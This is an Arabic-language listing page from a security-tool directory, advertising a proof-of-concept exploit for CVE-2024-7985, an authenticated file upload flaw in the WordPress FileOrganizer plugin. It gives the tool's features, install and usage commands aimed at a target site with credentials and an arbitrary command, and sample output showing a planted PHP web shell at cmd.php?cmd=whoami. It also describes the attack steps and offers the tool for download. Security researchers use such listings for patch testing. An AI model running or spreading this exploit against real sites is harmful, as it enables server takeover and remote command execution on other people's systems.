Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - رفع ملف تعسفي مع مصادقة (مشترك+) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-7985-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - رفع ملف تعسفي مع مصادقة (مشترك+)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - رفع ملفات تعسفي للمستخدمين المصادق عليهم (Subscriber+)

استغلال FileOrganizer - CVE-2024-7985

📌 نظرة عامة

CVE-2024-7985 - إضافة ووردبريس FileOrganizer <= 1.0.9 معرّضة لثغرة رفع ملفات تعسفي للمستخدمين المصادق عليهم، مما يسمح للمهاجمين بصلاحيات Subscriber+ برفع وتنفيذ ملفات خبيثة عن بُعد. تنشأ هذه الثغرة بسبب غياب التحقق من نوع الملف في دالة fileorganizer_ajax_handler، مما يجعل تنفيذ الأوامر عن بُعد (RCE) ممكنًا.

🚨 يسمح هذا الاستغلال للمهاجمين بتنفيذ أوامر تعسفية على الخادم! 🚨

⚡ الميزات

  • ✅ أتمتة الهجوم - تسجيل الدخول، استرجاع nonce، الاستغلال.
  • ✅ تجاوز الفحوصات الأمنية من خلال استغلال صلاحيات المستخدم المصادَق عليه.
  • ✅ كشف تلقائي للإصدار - يضمن أن الهدف معرّض للثغرة.
  • ✅ تنفيذ أوامر مخصصة - يمكن للمستخدم تحديد أي أمر.
  • ✅ التعامل مع مشكلات التحقق من SSL بسلاسة.

🛠️ المتطلبات

  • Python 3
  • requests
  • beautifulsoup4

تثبيت التبعيات:

root@kitploit:~
pip install requests beautifulsoup4

🚀 الاستخدام

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 الاستخدام - المساعدة

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

مثال على الإخراج:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 آلية عمل الاستغلال

1️⃣ فحص الإصدار - يحدد ما إذا كان الموقع معرّضًا للثغرة.
2️⃣ المصادقة - تسجيل الدخول إلى ووردبريس.
3️⃣ استخراج Nonce - استرجاع رمز الأمان.
4️⃣ رفع الملف - رفع سكربت PHP خبيث.
5️⃣ تنفيذ الأوامر - تنفيذ الأوامر التي يحددها المستخدم.


📌 إخلاء مسؤولية

هذا السكربت لأغراض تعليمية فقط؛ لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو عواقب. 🚨

تنزيل الأداة